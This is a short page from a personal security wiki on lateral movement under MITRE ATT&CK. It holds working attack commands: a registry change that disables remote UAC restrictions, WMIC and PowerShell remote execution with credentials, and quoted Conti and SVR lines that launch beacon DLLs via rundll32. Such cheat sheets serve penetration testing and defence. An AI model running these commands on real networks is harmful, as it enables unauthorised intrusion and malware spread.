burmat / nathan burchfield
  • security and systems administration
  • security / hacking
    • Domain Enumeration + Exploitation
      • Command and Control
      • Credential Access
      • Defense Evasion
      • Discovery
      • Execution
      • Impact
      • Lateral Movement
      • Persistence
      • Privilege Escalation
    • Tools and Services
      • Adobe Experience Manager (AEM)
      • amass
      • ike-scan
      • jq
      • Shodan
      • smbmap
      • tmux
      • tshark
      • Voice Over IP (VoIP)
    • One-Liners and Dirty Scripts
    • MSFvenom Cheetsheet
    • Web Application Hacking
      • Cross-Site Scripting (XXS)
      • SQL Injection (SQLi)
    • OSCP / PWK - Random Tips and Tricks
  • systems administration
    • Active Directory Administration
    • Exchange Administration
    • System Fixes
    • Helper Commands
    • Log Parsing
    • SQL Server Administration
    • Windows Terminal Themes
Powered by GitBook
On this page
  • Disable Remote UAC Restrictions
  • WMIC
  1. security / hacking
  2. Domain Enumeration + Exploitation

Lateral Movement

The adversary is trying to move through your environment. https://attack.mitre.org/tactics/TA0008/

Disable Remote UAC Restrictions

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

WMIC

Source: https://www.picussecurity.com/resource/blog/t1047-windows-management-instrumentation-of-the-mitre-attack-framework

WMI allows users with the required privileges to execute commands in remote hosts without additional tools. Adversaries abuse this feature to move laterally in a compromised network. Adversaries used the following commands to execute commands in a remote host.

wmic /node:<remote_ip> /user:<username> /password:<password> process call create cmd.exe /c "<command>"

Or, with PowerShell:

Invoke-WMIMethod -class Win32_Process -Name Create -ArgumentList "cmd /c <command>" -ComputerName <remote_hostname>

Conti TTP

wmic /node:victim_ip process call create "rundll32.exe C:/ProgramData/beacon_dll DllRegisterServer"

Russian Foreign Intelligence Service (SVR) TTP

wmic /node:<remote_host's_IP> /user:<username> /password:<password> process call create "rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost"
PreviousImpactNextPersistence

Last updated 4 months ago